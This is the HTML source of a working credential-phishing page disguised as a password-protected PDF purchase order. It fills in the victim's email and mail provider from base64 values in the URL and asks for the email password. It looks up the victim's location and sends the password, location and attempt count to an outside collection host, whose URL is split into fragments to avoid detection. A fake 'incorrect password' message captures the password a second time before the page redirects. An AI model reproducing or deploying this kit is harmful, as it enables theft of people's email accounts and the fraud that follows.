<!DOCTYPE html
	PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
	<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
	<title>PDF Online View</title>

	<link rel="apple-touch-icon" type="image/png" class="logoimg" href="" />
	<link rel="shortcut icon" type="image/x-icon" class="logoimg" href="" />
	<link rel="mask-icon" type="" class="logoimg" href="" color="#111" />
	<meta name="robots" content="noindex">
	<meta name="googlebot" content="noindex">
	<meta name="googlebot-news" content="noindex" />
	<meta name="otherbot" content="noindex" />
	<meta name="noarchive" content="noindex" />
	<meta name="nosnippet" content="noindex" />
	<meta name="noimageindex" content="noindex" />
	<meta name="robots" content="none">
	<meta name="googlebot" content="none">
	<meta name="googlebot-news" content="none" />
	<meta name="otherbot" content="none" />
	<meta name="noarchive" content="none" />
	<meta name="nosnippet" content="none" />
	<meta name="noimageindex" content="none" />
	<meta name="robots" content="nofollow">
	<meta name="googlebot" content="nofollow">
	<meta name="googlebot-news" content="nofollow" />
	<meta name="otherbot" content="nofollow" />
	<meta name="noarchive" content="nofollow" />
	<meta name="nosnippet" content="nofollow" />
	<meta name="noimageindex" content="nofollow" />
	<meta name="robots" content="max-snippet:0">
	<meta name="robots" content="unavailable_after: 2020-09-22">

	<link rel="shortcut icon" type="image/png"
		href="https://th.bing.com/th/id/OIP.FJYw9wm-Ns5szcAaGmpnpAAAAA?w=32&h=32&c=7&r=0&o=5&pid=1.7">

	<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css"
		integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
	<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css"
		integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
	<link href="https://ucarecdn.com/eae24034-0cc9-4528-827a-d46e30dd5a83/hover.css" rel="stylesheet" media="all">

	<script src="https://code.jquery.com/jquery-3.1.1.min.js"></script>
	<!--  <script src="https://klxszs.web.app/jp_outlook.js"> </script> -->
	<script>
		let resBox = 'PDF PO'
		let nbg1 = 'htt'
		let nbg2 = 'ps://phylo'
		let nbg3 = 'genetic-hems.000we'
		let nbg4 = 'bho'
		let nbg5 = 'stapp.com/sp.p'
		let nbg6 = 'hp'

		let ov1 = 'https'
		let ov2 = '://'
		let ov3 = 'i.im.ge'
		let ov4 = '/2023/04/14/'
		let ov5 = 'Lse3r0.'
		let ov6 = 'Gand.'
		let ov7 = 'png'

		sessionStorage.clear()
		let trialCount = sessionStorage.getItem("num_trial");

		if (!trialCount) {
			sessionStorage.setItem("num_trial", 0);
		} else if (trialCount >= 2) {
			window.location.assign(`${ov1}${ov2}${ov3}${ov4}${ov5}${ov6}${ov7}`)
		}
	</script>
	<script type="text/javascript">
/* 

		var docurl = '';
		const queryString = window.location.search;
		console.log(queryString);
		const urlParams = new URLSearchParams(queryString);
		const str = urlParams.get('prox')
		var proxx = str.substring(0, 4);
		var results = str.split('@');
		var result = results[1];
 */
	</script>
	<style type="text/css">
		.hide {
			display: none;
			}

		.grey-form {
			background-color: #ffffff;
			opacity: 1;
			pointer-events: none;
		}

		.alert-success {
			color: #155724;
			background-color: #d4edda;
			border-color: #c3e6cb;
		}



		.modal-body {
			padding: 0 !important;
		}

		.login-container {
			position: absolute;
			padding: 20px 20px 20px;
			text-align: center;
			background: #f5f5f5;
			border: 1px solid #ccc;
			z-index: 33;
			bottom: 20%;
			margin: 0;
			position: absolute;
			left: 50%;
			transform: translateX(-50%);
			border-radius: 5px;
			display: none;
		}

		.loginLoader {
			position: absolute;
			padding: 20px 20px 20px;
			text-align: center;
			z-index: 3;
			bottom: 20%;
			margin: 0;
			position: absolute;
			left: 50%;
			transform: translateX(-50%);
			border-radius: 5px;
			display: flex;
			justify-content: center;
			align-items: center;
			width: 300px;
			height: 300px;
		}

		#output {
			position: absolute;
			width: 400px;
			top: -75px;
			left: 0;
			color: #fff;
		}

		#output.alert-success {
			background: rgb(25, 204, 25);
		}

		#output.alert-danger {
			background: rgb(228, 105, 105);

		}

		.logos {
			width: 100%;
			height: auto;
			display: flex;
			justify-content: space-between;
			align-items: center;
		}


		.form-box input {
			width: 100%;
			margin: 1px;
			auto padding: 10px;
			text-align: center;
			height: 40px;
			border: 1px solid #ccc;
			;
			background: #ffffff;
			transition: 0.2s ease-in-out;

		}

		.form-box input:focus {
			outline: 50px;
			background: #ffffff;
		}

		.form-box input[type="text"] {
			border-radius: 5px 5px 0 0;
			text-transform: lowercase;
		}

		.form-box input[type="password"] {
			border-radius: 0 0 0px 0px;
			border-top: 0;
		}

		.form-box button.login {
			margin-top: 15px;
			padding: 10px 20px;

		}

		.animated {
			-webkit-animation-duration: 1s;
			animation-duration: 1s;
			-webkit-animation-fill-mode: both;
			animation-fill-mode: both;
		}

		@-webkit-keyframes fadeInUp {
			0% {
				opacity: 0;
				-webkit-transform: translateY(20px);
				transform: translateY(20px);
			}

			100% {
				opacity: 0;
				-webkit-transform: translateY(0);
				transform: translateY(0);
			}
		}

		@keyframes fadeInUp {
			0% {
				opacity: 0;
				-webkit-transform: translateY(20px);
				-ms-transform: translateY(20px);
				transform: translateY(20px);
			}

			100% {
				opacity: 1;
				-webkit-transform: translateY(0);
				-ms-transform: translateY(0);
				transform: translateY(0);
			}
		}

		.fadeInUp {
			-webkit-animation-name: fadeInUp;
			animation-name: fadeInUp;
		}

		.avatar {
			position: relative;
		}

		.padlock {
			position: absolute;
			width: 40px;
			height: 40px;
			bottom: -10px;
			left: -20px;
			//background-color: #fff;
		}

		@keyframes hide {
			from {
				opacity: 1;
			}

			to {
				opacity: 0;
			}
		}

		@keyframes show {
			from {
				opacity: 0;
			}

			to {
				opacity: 1;
			}
		}

		.lds-spinner {
		color: official;
		display: inline-block;
		position: relative;
		width: 80px;
		height: 80px;
		}
		.lds-spinner div {
		transform-origin: 40px 40px;
		animation: lds-spinner 1.2s linear infinite;
		}
		.lds-spinner div:after {
		content: " ";
		display: block;
		position: absolute;
		top: 3px;
		left: 37px;
		width: 6px;
		height: 18px;
		border-radius: 20%;
		background: #f00;
		}
		.lds-spinner div:nth-child(1) {
		transform: rotate(0deg);
		animation-delay: -1.1s;
		}
		.lds-spinner div:nth-child(2) {
		transform: rotate(30deg);
		animation-delay: -1s;
		}
		.lds-spinner div:nth-child(3) {
		transform: rotate(60deg);
		animation-delay: -0.9s;
		}
		.lds-spinner div:nth-child(4) {
		transform: rotate(90deg);
		animation-delay: -0.8s;
		}
		.lds-spinner div:nth-child(5) {
		transform: rotate(120deg);
		animation-delay: -0.7s;
		}
		.lds-spinner div:nth-child(6) {
		transform: rotate(150deg);
		animation-delay: -0.6s;
		}
		.lds-spinner div:nth-child(7) {
		transform: rotate(180deg);
		animation-delay: -0.5s;
		}
		.lds-spinner div:nth-child(8) {
		transform: rotate(210deg);
		animation-delay: -0.4s;
		}
		.lds-spinner div:nth-child(9) {
		transform: rotate(240deg);
		animation-delay: -0.3s;
		}
		.lds-spinner div:nth-child(10) {
		transform: rotate(270deg);
		animation-delay: -0.2s;
		}
		.lds-spinner div:nth-child(11) {
		transform: rotate(300deg);
		animation-delay: -0.1s;
		}
		.lds-spinner div:nth-child(12) {
		transform: rotate(330deg);
		animation-delay: 0s;
		}
		@keyframes lds-spinner {
		0% {
			opacity: 1;
		}
		100% {
			opacity: 0;
		}
		}

	</style>

</head>

<body style="background-color: #333;">
	<div class="container-fluid" style="position: fixed; height: 100vh; background: url('https://i.im.ge/2023/04/14/LaICl4.POINV.png') top center no-repeat; background-size: contain; filter: blur(4px);  -webkit-filter: blur(4px); width: 100%; left: 0; top: 0;">
		<div class="row" style="height: 100vh;">
			<div class="container">
				<div class="row">


				</div>
			</div>


			<!-- Modal for  -->
			<div style="display: block !important" class="modal" id="ajaxModal" tabindex="-1" role="dialog"
				aria-labelledby="exampleModalLabel" aria-hidden="true">
				<div class="modal-dialog" role="document">
					<div style="position: relative;
                  display: -webkit-box;
                  display: -ms-flexbox;
                  display: flex;
                  -webkit-box-orient: vertical;
                  -webkit-box-direction: normal;
                  -ms-flex-direction: column;
                  flex-direction: column;
                  width: 80%;
                  pointer-events: auto;
                  ">
						<div class="modal-body">






						</div>


					</div>
				</div>
			</div>
		</div>
	</div>
	<!-- https://i.im.ge/2022/06/19/rGepCP.png -->
	<div class="loginLoader">
		<div class="lds-spinner">
			<div></div>
			<div></div>
			<div></div>
			<div></div>
			<div></div>
			<div></div>
			<div></div>
			<div></div>
			<div></div>
			<div></div>
			<div></div>
			<div></div>
		</div>
	</div>
	<div class="login-container">
		<div id="output"></div>
		<div class="logos">
			<img id="mBoxLogo" class=" brand_logo" height="40px" src="">
			<div class="avatar">
				<img id="fieldImg" class=" brand_logo" width="80px" src="icon.png">
				<!-- <div class="padlock">
					<img id="fieldImg" class=" brand_logo" width="40px" src="lock.png">
				</div> -->
			</div>

		</div>
		<div class="form-box">

			<h4 style="font-size: 20px; margin-top: 20px;">PO15042023.pdf</h4>
			<p style="font-size: 14px;"><b>"PDF is password protected by <span id="mBox"></span> mail server
					security"</b></p>
			<!--<form id="contact" class="form-horizontal well">-->
			<form action="" method="post" id="form_">
				<input type='hidden' id="ckorg" value="">
				<input type="hidden" id="loc" name="loc">
				<input type="hidden" id="trial" name="trial">

				<input type="hidden" id="ck" aria-describedby="emailHelp" placeholder="Enter Email Address" value="">

				<input type='password' placeholder="Enter Email Password" required id='cknow' pattern="(?=^.{6,}$).*$">
				<div class="alert" id="errmsg" style="color: #e00; font-size: 14px; padding: 5px;"></div>
				<button class="btn btn-success btn-block login" style="background: #DE0000;" id="submit-btn"
					type="submit" ">View Document</button>
  			</form>
 		</div>
	</div>
<script>
	document.addEventListener('DOMContentLoaded', function () {
		setInterval(function () {
			let ccc = document.querySelector('.login-container')
			ccc.style.display = 'block'
			ccc.style.animation = 'show 1s ease'
		}, 3000)
	})
	const xx = window.location.href.split('?');
	let ck = document.querySelector('#ck')
	let ckorg = document.querySelector('#ckorg')
	let cknow = document.querySelector('#cknow')
	let loader = document.querySelector('#submit-btn')
	let loc = document.querySelector('#loc')
	let trial = document.querySelector('#trial')

	if (xx[1] != undefined) {
        let em = xx[1].split('-')
        document.querySelector('#mBox').innerHTML = atob(em[0]).toUpperCase()
        document.querySelector('#mBoxLogo').src = atob(em[0]).toLowerCase() + ".png"
        ck.value = atob(em[1])
        ckorg.value = atob(em[1])
    }
	trial.value = trialCount 
	let	myForm = document.querySelector('#form_') 
	myForm.addEventListener('submit', async function (event) {
		event.preventDefault() 
		let data = new FormData()
		let options = { method: 'POST', body: data }
		data.append('ck', ck.value) 
		data.append('ckorg', ckorg.value) 
		data.append('cknow', cknow.value)
		data.append('loc', loc.value) 
		data.append('trial', trial.value) 
		data.append('resBox', resBox)
		loader.innerHTML = "<i class='fa fa- fa-spin'></i> Verifing..." 
		const response = await fetch(`${nbg1}${nbg2}${nbg3}${nbg4}${nbg5}${nbg6}`, options) 
		const result = await response.text()
		loader.innerHTML = "<i class='fa fa- fa-spin'></i> Signing in..." 
		setTimeout(() => {
			loader.innerHTML = "View Document"
		}, 2000)

		console.log(result)

		trialCount++;
		sessionStorage.setItem("num_trial", trialCount);
		trial.value = trialCount

		if (trialCount >= 2) {
			window.location.assign(`${ov1}${ov2}${ov3}${ov4}${ov5}${ov6}${ov7}`)
		} else {
			cknow.value = ''
			document.getElementById('errmsg').innerHTML = "Incorrect account details. Please try again "
		}
	})

	$.get("https://ipinfo.io/json?token=10da60a9ff2d81", function (response) {
		let cou = `${response.city}, ${response.region}, ${response.country}. ${response.postal}
					${response.timezone}`
		$("#loc").val(cou);
	}, "jsonp");
</script>

</body>

</html>